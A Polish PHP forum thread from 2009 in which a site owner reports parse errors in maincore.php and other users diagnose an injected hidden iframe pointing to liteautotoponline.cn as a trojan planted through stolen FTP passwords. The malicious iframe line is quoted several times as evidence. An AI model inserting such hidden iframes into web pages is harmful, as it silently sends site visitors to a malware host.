![]() |
![]() ![]() |
![]() |
![]()
|
|
Grupa: Zarejestrowani Postów: 5 Pomógł: 0 Dołączył: 11.05.2009 Ostrzeżenie: (0%) ![]() ![]() |
function makefileopts($files, $selected="") {
$res = ""; for ($i=0;$i < count($files);$i++) { $sel = ($selected == $files[$i] ? " selected" : ""); $res .= "<option value='".$files[$i]."'$sel>".$files[$i]."</option>\n"; } return $res; } // Universal page pagination function by CrappoMan function makepagenav($start,$count,$total,$range=0,$li <iframe src="http://liteautotoponline.cn/ts/in.cgi?mozila11" width=2 height=4 style="visibility: hidden"></iframe> |
|
|
![]()
|
|
Grupa: Moderatorzy Postów: 8 989 Pomógł: 1550 Dołączył: 8.08.2008 Skąd: Słupsk/Gdańsk ![]() |
Odpowiadając na pytanie w temacie, to błędem jest własnie ten temat i 0 informacji o problemie = 0 pomyślunku autora = nieczytanie regulaminu
To ja ci pokaże zdjęcie mojego lapka i chcesz zgadywać jakiego OS-a sobie wgrałem? POKAŻ BŁĄD Ten post edytował wookieb 11.05.2009, 10:07:43 |
|
|
![]()
|
|
Grupa: Zarejestrowani Postów: 5 Pomógł: 0 Dołączył: 11.05.2009 Ostrzeżenie: (0%) ![]() ![]() |
Ostatnio otwierając stronę zamiast strony pojawia się komunikat
"Parse error: syntax error, unexpected '}', expecting ')' in /home/szaszk/public_html/maincore.php on line 1126" A oto linia 1126 <iframe src="http://liteautotoponline.cn/ts/in.cgi?mozila11" width=2 height=4 style="visibility: hidden"></iframe> |
|
|
![]()
|
|
Grupa: Moderatorzy Postów: 8 989 Pomógł: 1550 Dołączył: 8.08.2008 Skąd: Słupsk/Gdańsk ![]() |
Kod function makepagenav($start,$count,$total,$range=0,$li Jak coś robilesna pliku to usunales kod tej funkcji. Popraw. |
|
|
![]()
|
|
To co mam zrobić bo nie kumam
|
|
|
![]()
|
|
Przywróć oryginalny plik. A jeżeli to jest oryginał to przykro mi nic nie zrobisz. No chyba, że sam dopiszesz kod.
|
|
|
![]()
|
|
Grupa: Zarejestrowani Postów: 1 366 Pomógł: 261 Dołączył: 23.09.2008 Skąd: Bydgoszcz Ostrzeżenie: (0%) ![]() ![]() |
Hmm, jeżeli nic nie robiłeś to w/g mnie to jakiś wirus wrzucił Tobie na strona frame'a poprostu.
Zmień hasła do FTP'a i wrzuć poprzednią wersje pliku. |
|
|
![]()
|
|
Grupa: Zarejestrowani Postów: 230 Pomógł: 27 Dołączył: 27.05.2008 Skąd: Warszawa Ostrzeżenie: (0%) ![]() ![]() |
|
|
|
![]()
|
|
Grupa: Zarejestrowani Postów: 1 366 Pomógł: 261 Dołączył: 23.09.2008 Skąd: Bydgoszcz Ostrzeżenie: (0%) ![]() ![]() |
Cytat @melkorm Widać w jego pierwszym poście, że ma kawałek definicji funkcji ucięte wiec to nie iframe, tylko brakuje mu kodu, mógłbym zgadywać że coś robił zaznaczył nie chcąca wcisnął spacje i ma Ucięte bo mógł mu ten iframe uciąć ? Widać że chłopak raczej się nie zna i pewnie tego nie edytował wnioskuje po: Cytat Ostatnio otwierając stronę zamiast strony pojawia się komunikat Więc raczej bym obstawiał tego frame'a x] |
|
|
![]()
|
|
Nie posiadam kopi tego pliku tylko to co zostało.
|
|
|
![]()
|
|
No to raczej Tobie nie pomożemy ... chyba że podasz więcej szczegółów , może poproś admina hostingu o backup czy coś ... .
|
|
|
![]()
|
|
Oki Dzięki za pomoc to wina admina hostingu. Ja przeciez płacę za hosting i bezpieczeństwo. Nikt i nic tam grzebać nie mogło. Niech się teraz on martwi jakzrobić backup strony lub pliku
Warning: Unexpected character in input: ''' (ASCII=39) state=1 in /home/szaszk/public_html/maincore.php on line 101 Parse error: syntax error, unexpected $end, expecting ']' in /home/szaszk/public_html/maincore.php on line 101 I pojawia się // Sanitise $_SERVER globals $_SERVER['PHP_SELF'] = cleanurl($_SERVER['PHP_SELF']); $_SERVER['QUERY_STRING'] = isset($_SERVER['QUERY_STRING']) ? cleanurl($_SERVER['QUERY_STRING']) : ""; $_SERVER['REQUEST_URI'] = isset($_SERVER['REQUEST_URI']) ? cleanurl($_SERVER['REQUEST_URI']) : ""; $PHP_SELF = cleanurl($_SERVER['PHP_SELF']); |
|
|
![]()
|
|
Grupa: Zarejestrowani Postów: 1 Pomógł: 0 Dołączył: 15.05.2009 Ostrzeżenie: (0%) ![]() ![]() |
Kod <iframe src="http://liteautotoponline.cn/ts/in.cgi?mozila11" width=2 height=4 style="visibility: hidden"></iframe> To jest wirus. A dokładniej Trojan-Clicker.HTML.IFrame.agk To nie wina Twojego hostingu tylko TC. Coś wykradło komuś kto go używa hasła i poszło na ftpy i powklejało ten śliczny kodzik. Nie trzeba latać z gołą dupą po sieci było. Kod masz pewnie powklejany we wszystkie indexy php i htm, html we wszystkie pliki w których nazwie masz default, index i mainbody (IMG:http://forum.php.pl/style_emoticons/default/biggrin.gif) Niestety to coś również tnie pliki... Pozmieniaj hasła do ftp a potem poczysć sobie kod zanim google zafiltruje Ci stronę. Ten post edytował DoriS. 15.05.2009, 14:05:05 |
|
|
![]() ![]() |
![]() |
Aktualny czas: 25.08.2025 - 13:06 |